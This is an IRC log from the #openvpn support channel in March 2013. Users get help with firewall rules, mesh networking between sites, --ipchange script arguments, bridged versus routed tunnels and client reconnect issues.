http://securityskittles.wordpress.com/2012/03/14/two-factor-authentication-for-openvpn-on-centos-using-google-authenticator/ 13:14 <@vpnHelper> Joo got it. 13:17 < MorgyN> ooh 13:17 < MorgyN> ooooh 13:17 < MorgyN> oooohhhhhhh 13:17 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 13:18 < MorgyN> ill stopnow but this is veryrelevant to my interests 13:18 < pekster> There are public and/or copyleft implementations of google auth in dozens of popular languages, so it should be fairly trivial to plug that into openvpn in whatever way works best for a particular shop 13:19 < pekster> Everything from python to java, although you probably don't really want to call java to do your 2-factor auth from openvpn ;) 13:27 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 13:32 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 13:35 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 13:38 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 13:39 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has quit [Ping timeout: 264 seconds] 13:44 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 13:45 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Remote host closed the connection] 13:52 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has joined #openvpn 14:11 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in] 14:18 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 14:19 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has quit [Quit: nand] 14:20 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has joined #openvpn 14:23 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 14:23 -!- mode/#openvpn [+v s7r] by ChanServ 14:26 -!- ar0nic [~no@c-174-56-147-242.hsd1.sc.comcast.net] has joined #openvpn 14:42 -!- Sidewinder [~de@unaffiliated/sidewinder] 
has quit [Quit: Leaving] 14:47 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:55 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 14:55 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:56 -!- kyrix [~ashley@85.126.76.82] has quit [Ping timeout: 245 seconds] 14:57 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 245 seconds] 15:00 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 15:00 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 15:01 -!- JSharpe [~JSharpe@176.227.206.250] has quit [Quit: Leaving] 15:03 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 15:05 -!- JSharpe [~JSharpe@5.152.198.170] has joined #openvpn 15:08 -!- Sanguines [~anon@c-67-165-169-36.hsd1.il.comcast.net] has joined #openvpn 15:08 -!- eHAPPY [~V1CE@ip174-73-2-35.no.no.cox.net] has joined #openvpn 15:09 -!- Orbi [~opera@109.129.0.27] has joined #openvpn 15:09 < eHAPPY> I just installed the openvpn access server for my esxi server and when i try to login through the webclient i get a "not authorized" message 15:10 < eHAPPY> any idea why or what i need to do? 
15:10 < pekster> !as 15:10 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 15:11 < pekster> This channel is for the GPL OpenVPN project, not the commercial Access Service product 15:11 < eHAPPY> ah ok, ty 15:12 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 15:12 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 15:13 -!- eHAPPY [~V1CE@ip174-73-2-35.no.no.cox.net] has left #openvpn [] 15:15 -!- voidnecron [~voidnecro@unaffiliated/necron] has joined #openvpn 15:15 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 15:17 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 245 seconds] 15:22 -!- JSharpe [~JSharpe@5.152.198.170] has quit [Read error: Connection reset by peer] 15:29 < Sanguines> is "iptables -I INPUT -p tcp --dport 1194 -j ACCEPT" sufficient to open the port in Debian? The server appears to be running, but I cannot access it. 15:30 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 15:31 < pppingme> Sanguines you running openvpn with tcp or more likely udp? 15:31 < Sanguines> Would that be on UDP? That would explain it 15:32 -!- JSharpe [~JSharpe@185.2.137.212] has joined #openvpn 15:32 < pppingme> openvpn is typically setup to use udp 15:33 < Sanguines> Well I'm getting a different error than before, that certainly seems to have done something =) w00t. I no nothing :P 15:45 -!- Valcorb [~Valcorb@d54c68bc0.access.telenet.be] has joined #openvpn 15:45 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 15:49 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 256 seconds] 15:56 < rob0> -I, as you know from the iptables(8) man page, inserts the rule at the beginning of the chain. But we don't know what other rules you might have, so there is no sure answer. 
There are numerous ways I can think of wherein your -I rule would not work. 15:56 -!- kbarry [~chatzilla@rrcs-24-153-167-50.sw.biz.rr.com] has joined #openvpn 16:09 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 16:11 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 16:16 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 260 seconds] 16:21 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:25 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Quit: Leaving] 16:25 -!- JSharpe [~JSharpe@185.2.137.212] has quit [Quit: Leaving] 16:43 -!- kbarry [~chatzilla@rrcs-24-153-167-50.sw.biz.rr.com] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0/20130215130331]] 17:00 -!- Sanguines [~anon@c-67-165-169-36.hsd1.il.comcast.net] has quit [] 17:04 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 17:05 <@krzee> rob0, man whats? 17:05 <@krzee> what are these man pages you speak of 17:06 -!- zbychuk [~zbychuk@77-253-243-181.adsl.inetia.pl] has joined #openvpn 17:08 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Quit: Leaving] 17:08 < rob0> The reference documents that people who ask questions in IRC should, but rarely do, consult first. 17:09 < zbychuk> !welcome 17:09 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. 
|| Also interesting: !man !/30 !topology !iporder !sample !forum 17:09 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 17:10 < zbychuk> !howto 17:10 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 17:10 < zbychuk> !route 17:10 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide or (#4) See !serverlan or !clientlan for steps and troubleshooting flowcharts for LANs 17:10 <@vpnHelper> behind the server or client 17:10 < zbychuk> !redirect 17:10 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. 
or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 17:10 <@vpnHelper> http://ircpimps.org/redirect.png 17:11 -!- zbychuk [~zbychuk@77-253-243-181.adsl.inetia.pl] has left #openvpn ["WeeChat 0.3.8"] 17:13 -!- sh_t [~sht@176.222.238.158] has quit [Ping timeout: 255 seconds] 17:19 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 17:19 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Remote host closed the connection] 17:19 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 17:23 -!- kantlivelong [~kantlivel@47.23.189.90] has quit [Ping timeout: 245 seconds] 17:23 -!- zoredache [~zoredache@pdpc/supporter/professional/zoredache] has joined #openvpn 17:26 < zoredache> does the community edition of openvpn support the ... ... ... syntax in the configuration file? 17:29 -!- Falteckz [~Falteckz@121.99.31.205] has joined #openvpn 17:29 < Falteckz> G'Day 17:29 < Falteckz> Multiple clients on an OpenVPN Network 17:29 < Falteckz> Do they connect directly if possible? 17:29 < zoredache> no 17:30 < Falteckz> All traffic is via the server? 17:30 < zoredache> yup. 17:30 < Falteckz> So adding 'redundency' with multiple servers wont do that at all 17:30 < Falteckz> It's just more servers that still can't talk to other clients. 17:30 < zoredache> I am sure I saw someone mention a mesh here a while back. 17:30 < Falteckz> I'm trying to setup a mesh network between multiple sites 17:30 < Falteckz> Was hoping OpenVPN could do it. 17:30 < zoredache> !mesh 17:30 < rob0> !inline 17:30 <@vpnHelper> "mesh" is (#1) openvpn does not do mesh networking or (#2) see !rip or (#3) check out http://github.com/darkpixel/openmesher/ for auto-creating openvpn meshes 17:30 <@vpnHelper> "inline" is (#1) Inline files (e.g. ... 
are supported since OpenVPN 2.1rc1 and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) or (#2) https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs 17:31 < zoredache> rob0: thanks :) 17:31 < rob0> A mesh can be done "simply" by having direct tunnels from each site to each other site. Obviously that does not scale well beyond a few sites. 17:32 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 17:33 < Falteckz> If a server was to go down at one site, but not the internet connection. That entire site is still out of luck if it wants to get on the VPN? 17:33 < Falteckz> Without going in and changing the server address to a remote one 17:33 < rob0> You can't use the VPN if openvpn is not running or not connected. 17:35 -!- Orbi [~opera@109.129.0.27] has quit [Ping timeout: 256 seconds] 17:35 < Falteckz> The main thing I'm desiring is that Client A can connect to Server A, and Client B to Server B, but if Client A and Client B wish to talk to each other. They don't have to C.A->S.A->S.B->C.B 17:35 < Falteckz> They can connect directly 17:35 < Falteckz> It doen't work that way, correct? 17:35 < Falteckz> *doesn't. 17:36 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving] 17:36 < rob0> You can set up as many instances of openvpn as you and your systems can handle. That's more or less what I said above, about how to do a mesh. 17:37 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 17:37 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 17:37 -!- marksaitis_ [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 17:38 < Falteckz> Okay. 17:38 < Falteckz> But does that mean I require more than one instance per machine? 
17:38 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [Client Quit] 17:38 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Disconnected by services] 17:38 -!- marksaitis_ [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Remote host closed the connection] 17:39 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 17:39 < rob0> I don't know what you require. But if you want to do a mesh among three sites, you require two instances per site. For four sites, three per site. For X sites, X-1 instances per site. 17:39 < rob0> The most I have done was seven sites, six tunnels per site. 17:40 < zoredache> or you need a different VPN tool that has a full-mesh setup. 17:40 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 17:40 < rob0> sure. They're talking about that for the future. 17:40 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 17:42 < rob0> I guess it could be done by signalling a pair of clients to connect to one another on a specified port. 17:43 < zoredache> I recall the package I was thinking about. I was reading about [tinc](http://www.tinc-vpn.org/) a while back and it supposedly creates a full mesh. 17:43 <@vpnHelper> Title: tinc wiki (at www.tinc-vpn.org) 17:43 < rob0> I mean: when ClientA tells the server it wants to get to ClientB, the server tells each one the real IP address of the other, and a port for each to use. 
17:44 < rob0> (and maybe they'd negotiate their own session key, I'm not sure how the crypto would work) 17:46 < Falteckz> Yeah, I mean the crypto wouldn't matter 17:46 < Falteckz> All they would need is the two addresses and the two port numbers 17:46 < Falteckz> ( Both source and dest ports really, for Nat punching ) 17:47 < Falteckz> * Crypto wouldn't matter in the context that it's irrelevant how it works so long as it does so. 17:47 < rob0> hmmm, tinc looks interesting, but where they talk about "why tinc?" they only mention "why not FreeS/WAN?" 17:51 < zoredache> Well tinc is one of the few tools with an full mesh mode, aside from IPSEC, which exists eveywhere, but is ugly to setup. 17:52 < zoredache> Plus the full mesh bits of IPsec are basically impossible if you have NAT at all. 17:54 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 17:55 < rob0> I don't think full mesh in openvpn would be very difficult to implement, but of course it wouldn't get through every NAT. 18:02 < zoredache> rob0: did you use routing or bridging for that 7 site mesh? I am trying to figure out how you handled the routing for that. 18:19 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Ping timeout: 256 seconds] 18:20 < rob0> I don't use bridging for anything. Each tunnel set up a route to each LAN behind each peer. 18:20 < rob0> we used /20's IIRC 18:21 < zoredache> so if the direct link between two systems failed, did you also have other routes if an indirect path was possible? 18:23 < rob0> well, we talked about that, but the customer figured if the site server was down, the site was down. 18:24 < rob0> more trouble to set that up than it would be worth 18:25 < zoredache> ah. It is the full mesh VPN with routing such that any path could be used that is giving me a headache. 18:26 < zoredache> If you had bridged your interface I would guess you could use OSPF/RIP/etc. 
18:26 < zoredache> Or is it possible to get a routing protocol to actually work corectly in a routed openvpn config, I wonder.. 18:27 < kisom> im drunk, lol 18:40 -!- pulz [geir@winning.no] has joined #openvpn 18:42 < pulz> is a client supposed to be able to access its own lan when its connected to a ovpn server ? 18:42 < EugeneKay> Usually yes 18:43 < pulz> define usually 18:43 < EugeneKay> Depends how you set up your vpn configuration 18:43 < pulz> any points as to what settings are related to this ? 18:43 < EugeneKay> Typical use cases are to grant access to a remote LAN or redirect all internet-bound traffic through the server 18:43 < EugeneKay> Read the howto 18:44 < zoredache> pulz: It is almost always about routing. 18:47 < pulz> zoredache: figured as much, will have to look into it i gues 18:54 < rob0> zoredache, I am pretty sure it could be done, maybe with a routing daemon, but unfortunately I didn't get to take it that far. 18:54 < rob0> would have been fun! 18:54 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 19:02 -!- JackWinter1 [~jack@ppp-256.vo.lu] has joined #openvpn 19:03 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 19:03 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 19:03 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 19:03 -!- mode/#openvpn [+o krzee] by ChanServ 19:05 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Ping timeout: 248 seconds] 19:08 -!- Valcorb [~Valcorb@d54c68bc0.access.telenet.be] has quit [] 19:10 -!- raidz is now known as raidz_away 19:20 -!- zoredache [~zoredache@pdpc/supporter/professional/zoredache] has quit [Remote host closed the connection] 19:56 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 272 seconds] 20:06 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 20:41 -!- hotwings [hd@secksy.net] has joined #openvpn 20:42 < hotwings> i want to use 
--ipchange to update dyndns whenever my ip changes, but how would i use it if i need to send an arg with the shell command? --ipchange "shellcmd myarg" ? 20:49 -!- ar0nic [~no@c-174-56-147-242.hsd1.sc.comcast.net] has quit [Ping timeout: 244 seconds] 21:02 <@krzee> !script 21:02 <@vpnHelper> "script" is see http://openvpn.net/index.php/open-source/documentation/manuals/69-openvpn-21.html#lbAR for a list of places scripts can hook into openvpn 21:02 <@krzee> what sort of arg would you need? 21:02 <@krzee> everything you need should be variables already 21:31 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 21:43 < hotwings> that doesnt make any sense at all.. why would my scripts args being stored in variables? 21:43 < hotwings> *be 21:44 < EugeneKay> You don't get any args to your script 21:44 < EugeneKay> You need to read the env variables, which are listed in the man page 21:45 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 276 seconds] 21:46 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 21:47 < hotwings> thats interesting since the "--ipchange" section at http://openvpn.net/index.php/open-source/documentation/manuals/69-openvpn-21.html says, 21:47 <@vpnHelper> Title: OpenVPN 2.1 (at openvpn.net) 21:47 -!- p3rror [~mezgani@41.250.238.203] has quit [Ping timeout: 245 seconds] 21:47 < hotwings> "Note that cmd can be a shell command with multiple arguments, in which case all OpenVPN-generated arguments will be appended to cmd to build a command line which will be passed to the script. 
" 21:49 < EugeneKay> I've not used that command, so I'm not familiar with the exact syntax 21:49 < hotwings> you can easily pass args to your own scripts when using --ipchange; --ipchange "yourscript yourarg1 yourarg2 yourarg3 etc" 21:49 < EugeneKay> My reading of the man page says that you can do `--ipchange Foo Bar`, but if you know those args ahead of time, that info oughta be coded into the script 21:49 < hotwings> i didnt realize you had to --script-security 2 or higher though. thats why it wasnt working 21:50 < EugeneKay> You also get ip_address and port_number as args 21:50 < EugeneKay> Any info past that has to be gleaned from env vars 21:50 < hotwings> EugeneKay - thats fine if the script only performs one task. but maintenance scripts tend to use args as a way for the user to tell the script what he wants it to do 21:52 < hotwings> for example: script [start|stop|restart] [some process or function supported by the script] 22:15 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 264 seconds] 22:17 -!- vistas [~vistas@c-71-204-33-119.hsd1.ga.comcast.net] has joined #openvpn 22:18 < vistas> Where can I access logs for the client on Windows 7? It just hands on "Obtaining Configuration". 22:22 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 22:29 < vistas> SESSION_ID: OpenVPNClientSet: submit_creds session ID 22:29 < vistas> It's like IPSec is easier than this. 22:29 < vistas> Well, I never set it up myself. But :( 22:30 -!- hotwings [hd@secksy.net] has left #openvpn [] 22:41 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 22:43 -!- speed_racer8 [~speed_rac@98.196.168.201] has joined #openvpn 22:49 < vistas> Well I didn't figure it out because of logfiles, but because I saw that the TAP interface was disabled. 22:49 < vistas> Thanks. 
22:55 -!- Matir [~matir@ubuntu/member/matir] has quit [Ping timeout: 255 seconds] 23:03 -!- Matir [~matir@ubuntu/member/matir] has joined #openvpn 23:39 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Quit: ZNC - http://znc.in] 23:41 -!- md_5 [~md_5@mcdevs/trusted/md-5] has joined #openvpn 23:49 -!- md_5 [~md_5@mcdevs/trusted/md-5] has quit [Quit: ZNC - http://znc.in] 23:51 -!- md_5 [~md_5@mcdevs/trusted/md-5] has joined #openvpn --- Day changed Sat Mar 02 2013 00:00 -!- brute11k [~brute@89.249.231.52] has joined #openvpn 00:13 -!- Falteckz [~Falteckz@121.99.31.205] has quit [Ping timeout: 272 seconds] 01:22 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 01:28 -!- aaaar0n [~no@c-174-56-147-242.hsd1.sc.comcast.net] has joined #openvpn 01:28 -!- aaaar0n is now known as ar0nic 02:05 -!- scyld [~scyld@unaffiliated/wasyl] has joined #openvpn 02:11 -!- xbanux [~xbanux@triband-mum-59.182.177.27.mtnl.net.in] has joined #openvpn 02:11 -!- Orbi [~opera@109.129.22.206] has joined #openvpn 02:25 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out] 02:25 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 02:48 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 02:58 -!- brute11k [~brute@89.249.231.52] has quit [Quit: Leaving.] 03:15 -!- scyld [~scyld@unaffiliated/wasyl] has quit [Quit: Wychodzi] 03:17 -!- Sevet [steveayre@149.241.69.221] has joined #openvpn 03:19 < Sevet> hi, does anyone know why my udp openvpn connections would constantly keep reconnecting? 03:19 < Sevet> i see 'Inactivity timeout (--ping-restart), restarting' in the server and clients logs, despite using 'keepalive 5 30' on the server 03:20 < Sevet> (2.1.3 server, 2.1.4 client) 03:28 < Sevet> from a packet trace on the client it appears that it's receiving ping packets from the server but never sending any 03:29 < Sevet> should the ping packets get a reply? 
03:32 < Sevet> ok, I have found my answer: I had push-reset in the ccd and it seems that was preventing the ping/ping-restart from being pushed to the client
03:52 -!- Sevet [steveayre@149.241.69.221] has quit []
04:13 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
04:13 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
04:13 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
04:13 -!- mode/#openvpn [+o krzee] by ChanServ
04:17 -!- krphop [~krphop@74.82.160.100] has quit [Ping timeout: 245 seconds]
04:20 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has joined #openvpn
04:23 -!- xbanux [~xbanux@triband-mum-59.182.177.27.mtnl.net.in] has quit [Read error: Connection reset by peer]
04:23 -!- xbanux [~xbanux@triband-mum-59.182.177.192.mtnl.net.in] has joined #openvpn
04:26 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
04:39 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has quit [Quit: ZNC - http://znc.in]
04:44 -!- p3rror [~mezgani@41.249.135.33] has joined #openvpn
04:45 -!- JSharpe [~JSharpe@146.185.24.18] has joined #openvpn
05:10 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
05:45 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
05:45 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
05:45 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
05:45 -!- mode/#openvpn [+o krzee] by ChanServ
05:47 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
05:49 -!- JackWinter1 [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in]
05:50 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn
05:51 -!- p3rror [~mezgani@41.249.135.33] has quit [Read error: Operation timed out]
05:56 -!- p3rror [~mezgani@41.249.135.33] has joined #openvpn
06:46 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds]
06:48 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
07:41 -!- dli_ [~dli@dsl-69-171-139-151.acanac.net] has joined #openvpn
08:22 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 264 seconds]
08:35 -!- p3rror [~mezgani@41.249.135.33] has quit [Read error: Connection reset by peer]
08:40 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
08:49 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn
08:54 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn
08:56 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has joined #openvpn
08:58 < neilhwatson> In bridged mode should the server have a route to know how to find the client's Openvpn assigned IP address?
09:01 -!- digilink [~digilink@unaffiliated/digilink] has quit [Quit: ZNC - http://znc.in]
09:02 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn
09:12 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
09:13 -!- digilink [~digilink@unaffiliated/digilink] has quit [Quit: ZNC - http://znc.in]
09:15 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn
09:17 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Read error: Connection reset by peer]
09:20 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn
09:27 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 246 seconds]
09:29 -!- JackWinter [~jack@ppp-256.vo.lu] has left #openvpn ["Konversation terminated!"]
09:33 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn
09:33 < EugeneKay> You shouldn't be using bridged mode.
09:36 < neilhwatson> Why?
09:36 < EugeneKay> !whybridge
09:36 <@vpnHelper> "whybridge" is (#1) you only bridge if you want layer2 to the lan. if you want layer2 only between vpn nodes then routed tap is enough. if you only want layer3 use tun. or (#2) See this URL for a more in-depth discussion on bridging vs routing: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting
09:37 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Remote host closed the connection]
09:38 < neilhwatson> I'd like to tunnel ipv6 through the tunnel and I want the client to have presence on ipv4 and ipv6 networks that the server is a member of.
09:45 -!- aduitsis [~aduitsis@dsl-aav5go.dyn.edudsl.gr] has joined #openvpn
09:59 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn
09:59 -!- aduitsis [~aduitsis@dsl-aav5go.dyn.edudsl.gr] has quit [Quit: Colloquy for iPad - http://colloquy.mobi]
10:01 -!- brute11k [~brute@89.249.230.53] has joined #openvpn
10:16 < dli_> is there an iproute2 replacement for server config: push "route 192.168.3.0 255.255.255.0"
10:20 < dli_> ERROR: Linux route add command failed: external program exited with error status: 2
10:20 < dli_> can I connect to an openvpn 2 server using an openvpn version 3 client?
10:27 -!- mongoman [~mongoman@200.46.98.147] has joined #openvpn
10:41 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
10:54 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
10:55 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Remote host closed the connection]
10:55 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
10:56 -!- Valcorbh [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
10:59 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 246 seconds]
11:08 -!- digilink [~digilink@unaffiliated/digilink] has quit [Quit: ZNC - http://znc.in]
11:09 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
11:11 -!- Valcorbh [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 264 seconds]
11:11 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has quit [Quit: nand]
11:11 -!- Orbi [~opera@109.129.22.206] has left #openvpn []
11:12 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has joined #openvpn
11:21 < EugeneKay> There is no openvpn 3.x
11:22 < EugeneKay> neilhwatson - 2.3 supports ipv6 payload; you can do all of that in routing.
11:22 < EugeneKay> Heck, you can even do 6in4 on a TAP adapter in 2.2 (with script assistance for setup/teardown)
11:30 < neilhwatson> I almost have tap working. The last hurdle is that the server cannot ping the client's assigned IP.
11:31 -!- brute11k1 [~brute@89.249.230.53] has joined #openvpn
11:33 -!- brute11k [~brute@89.249.230.53] has quit [Ping timeout: 264 seconds]
11:38 < dli_> EugeneKay, sorry, I mean a 2.3 client connection to a 2.2 server
11:39 < dli_> EugeneKay, the client gets an IP, but cannot ping
11:40 < neilhwatson> dli_ I think that would work provided the client is not attempting to use a feature the server might not understand.
11:43 < dli_> neilhwatson, still couldn't ping: http://pastebin.com/3USjmDjv
11:47 < neilhwatson> Mar 2 12:40:28 dasus openvpn@tw3[23067]: ERROR: Linux route add command failed: external program exited with error status: 2
11:48 < dli_> neilhwatson, push "route 192.168.3.0 255.255.255.0"
11:48 < dli_> neilhwatson, I'm wondering whether I can try iproute2
11:49 < neilhwatson> I don't know openvpn that well.
11:50 < dli_> neilhwatson, also, the same error was there for the 2.2 client; it worked with this specific error
11:52 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn
12:16 -!- master_o1_master [~master_of@p4FF242D5.dip.t-dialin.net] has joined #openvpn
